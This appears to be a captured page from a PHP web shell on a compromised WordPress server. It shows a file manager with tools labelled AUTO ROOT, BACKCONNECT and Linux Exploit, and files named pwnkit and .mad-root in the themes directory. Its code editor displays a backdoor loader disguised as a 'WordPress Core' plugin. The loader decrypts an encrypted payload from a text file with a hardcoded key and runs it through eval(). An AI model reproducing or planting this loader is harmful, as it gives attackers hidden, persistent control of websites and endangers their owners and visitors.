Linux webm019.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.128.20.19 | : 216.73.216.176
Cant Read [ /etc/named.conf ]
8.0.30
nicedoo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
nicedoo /
www /
wp-content /
themes /
[ HOME SHELL ]
Name
Size
Permission
Action
grocery-shopping
[ DIR ]
drwxr-xr-x
hello-elementor
[ DIR ]
drwxr-xr-x
twentytwentyfour
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
22gsgkljjklaf.php
1.03
KB
-rw-r--r--
dbbojzlrtx.txt
18.5
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
wp-k5c2n6e3l1.php
192.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 22gsgkljjklaf.php
<?php /** * @package Wordpress_Core * @version 1.7.3 */ /* Plugin Name: WordPress Core Plugin URI: https://wordpress.org/plugins/ Description: This is core plugin for managment WordPress. Version: 1.7.3 Author URI: https://wordpress.org/ */ error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); class UnsafeCrypto { const METHOD = 'aes-256-ctr'; public static function decrypt($message, $nonce, $key, $encoded = false) { if ($encoded) { $message = base64_decode($message, true); $nonce = base64_decode($nonce, true); if ($message === false || $nonce === false) { throw new Exception('Encryption failure'); } } $plaintext = openssl_decrypt( $message, self::METHOD, $key, OPENSSL_RAW_DATA, $nonce ); return $plaintext; } } $key = hex2bin('020607f37f286ebe8586d61b6601bd2af008e1d96886b4928eb22cf8e1cc5d38'); $parts = file('./dbbojzlrtx.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true); eval($decrypted); ?>
Close